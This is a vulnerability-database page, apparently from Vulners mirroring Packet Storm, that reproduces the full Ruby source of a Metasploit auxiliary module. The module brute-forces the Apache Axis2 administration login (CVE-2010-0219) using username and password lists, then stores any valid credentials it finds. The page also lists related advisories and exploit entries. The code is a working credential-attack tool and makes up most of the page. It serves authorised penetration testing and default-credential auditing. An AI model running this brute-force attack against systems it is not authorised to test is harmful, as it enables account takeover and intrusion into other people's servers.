Lucene search
+L

Apache Axis2 Brute Force Utility

🗓️ 01 Sep 2024 00:00:00Reported by Leandro Oliveira, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 347 Views

Apache Axis2 login brute force utility for versions 1.4.1 and 1.6.2

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Apache Axis2 Default Credentials
27 May 201000:00
nessus
circl
Circl
CVE-2010-0219
14 Dec 201000:00
circl
checkpoint_advisories
Check Point Advisories
CA ARCserve D2D Axis2 Default Credentials Remote Code Execution (CVE-2010-0219)
8 Feb 201100:00
checkpoint_advisories
cve
CVE
CVE-2010-0219
18 Oct 201016:00
cve
cvelist
Cvelist
CVE-2010-0219
18 Oct 201016:00
cvelist
exploitdb
Exploit DB
CA ARCserve D2D r15 - Web Service Servlet Code Execution
30 Dec 201000:00
exploitdb
exploitdb
Exploit DB
Axis2 - (Authenticated) Code Execution (via REST) (Metasploit)
14 Dec 201000:00
exploitdb
exploitdb
Exploit DB
Axis2 / SAP BusinessObjects - (Authenticated) Code Execution (via SOAP) (Metasploit)
14 Dec 201000:00
exploitdb
kitploit
Kitploit
CVE-2010-0219
29 Aug 202617:28
kitploit
metasploit
Metasploit
Apache Axis2 Brute Force Utility
28 May 201419:31
metasploit
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'metasploit/framework/login_scanner/axis2'  
require 'metasploit/framework/credential_collection'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::AuthBrute  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
  
def initialize  
super(  
'Name' => 'Apache Axis2 Brute Force Utility',  
'Description' => %q{  
This module attempts to login to an Apache Axis2 instance using  
username and password combinations indicated by the USER_FILE,  
PASS_FILE, and USERPASS_FILE options. It has been verified to  
work on at least versions 1.4.1 and 1.6.2.  
},  
'Author' =>  
[  
'Leandro Oliveira <leandrofernando[at]gmail.com>'  
],  
'References' =>  
[  
[ 'CVE', '2010-0219' ],  
[ 'OSVDB', '68662'],  
],  
'License' => MSF_LICENSE  
)  
  
register_options( [  
Opt::RPORT(8080),  
OptString.new('TARGETURI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),  
])  
end  
  
# For print_* methods  
def target_url  
"http://#{vhost}:#{rport}#{datastore['URI']}"  
end  
  
def run_host(ip)  
uri = normalize_uri(target_uri.path)  
  
print_status("Verifying login exists at #{target_url}")  
begin  
send_request_cgi({  
'method' => 'GET',  
'uri' => uri  
}, 20)  
rescue => e  
print_error("Failed to retrieve Axis2 login page at #{target_url}")  
print_error("Error: #{e.class}: #{e}")  
return  
end  
  
print_status "#{target_url} - Apache Axis - Attempting authentication"  
  
cred_collection = build_credential_collection(  
username: datastore['USERNAME'],  
password: datastore['PASSWORD']  
)  
  
scanner = Metasploit::Framework::LoginScanner::Axis2.new(  
configure_http_login_scanner(  
uri: uri,  
cred_details: cred_collection,  
stop_on_success: datastore['STOP_ON_SUCCESS'],  
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],  
connection_timeout: 5,  
http_username: datastore['HttpUsername'],  
http_password: datastore['HttpPassword']  
)  
)  
  
scanner.scan! do |result|  
credential_data = result.to_h  
credential_data.merge!(  
module_fullname: self.fullname,  
workspace_id: myworkspace_id  
)  
case result.status  
when Metasploit::Model::Login::Status::SUCCESSFUL  
print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"  
credential_core = create_credential(credential_data)  
credential_data[:core] = credential_core  
create_credential_login(credential_data)  
:next_user  
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT  
if datastore['VERBOSE']  
print_brute :level => :verror, :ip => ip, :msg => "Could not connect"  
end  
invalidate_login(credential_data)  
:abort  
when Metasploit::Model::Login::Status::INCORRECT  
if datastore['VERBOSE']  
print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"  
end  
invalidate_login(credential_data)  
end  
end  
  
end  
  
  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Sep 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.89871
347